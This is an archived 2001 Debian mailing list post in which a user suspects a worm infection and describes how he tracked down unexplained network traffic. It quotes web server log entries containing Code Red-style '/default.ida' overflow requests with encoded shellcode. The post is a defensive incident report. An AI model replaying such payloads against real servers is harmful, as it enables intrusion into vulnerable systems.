Fwd: Re: please read: very odd network traffic

To: debian-user@lists.debian.org
Subject: Fwd: Re: please read: very odd network traffic
From: William Leese <wleese@europe.nl.com>
Date: Tue, 7 Aug 2001 18:53:38 +0200
Message-id: <[🔎] 200108071654.f77GsoD99886@njord.bart.nl>


----------  Forwarded Message  ----------

there's more though. but again i'm not sure.. for the first time i've seen a
few odd requests being logged in boa, just a small snippet:


[07/Aug/2001:06:26:03 +0000] request from 195.38.105.70 "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
 ("/var/www/default.ida"): document open: No such file or directory
 [07/Aug/2001:07:13:08 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:07:43:15 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:07:59:05 +0000] malformed request:
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b
%u53ff%u0078%u0000%u00=a HTTP/1.1"
[07/Aug/2001:08:17:28 +0000] request from 195.38.44.138 "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780
1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
 ("/var/www/default.ida"): document open: No such file or directory
 [07/Aug/2001:08:31:51 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:08:57:30 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:08:55 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:13:38 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:20:26 +0000] bogus HTTP version: " HTTP/1.0"
[07/Aug/2001:09:29:23 +0000] bogus HTTP version: " HTTP/1.0"

this all seems rather coincedential.. and seems to confirm my idea of being
infected with a virus/worm.. hope this helps (me, heh.. :)

On Tuesday 07 August 2001 18:40, William Leese wrote:
> I think my machine has been compromised though i'm not entirely sure.
>
> I suddenly saw a reasonable amount of traffic when I wasn't going anything
> that could generate it so I turned off all the net connection using
> applications and still there was traffic.
>
> Opened top to see if there was a process that wasn't terminated yet, nope..
> that wasn't it.
>
> Turned off networking.
>
> Tried netstat -ap and found to my great dismay that inetd had started the
> ftp service or atleast that port was available. I accidentally installed
> wu-ftp awhile ago but i thought i had removed it.. oh well. So, commented
> it out and restarted inetd.
>
> no luck.. the moment i started the networking script there was traffic.
>
> Turned off networking. But not before using Ethereal to capture a few
> packets.
>
> I've added an attachment with the log, could someone take a look at it and
> tell me what could be causing this.. it would seem like something (a worm
> or virus) is scanning the network looking for (vulnerable?) computers.

-------------------------------------------------------

Reply to:

Follow-Ups:
- Re: Fwd: Re: please read: very odd network traffic
  - From: Dave Sherohman <esper@sherohman.org>
- Re: Re: please read: very odd network traffic
  - From: "Hall Stevenson" <hallstevenson@mindspring.com>

Prev by Date: Re: FW: Careful. This is for information only.
Next by Date: Re: upgrading to sid
Previous by thread: Re: Fwd: please read: very odd network traffic
Next by thread: Re: Fwd: Re: please read: very odd network traffic
Index(es):
- Date
- Thread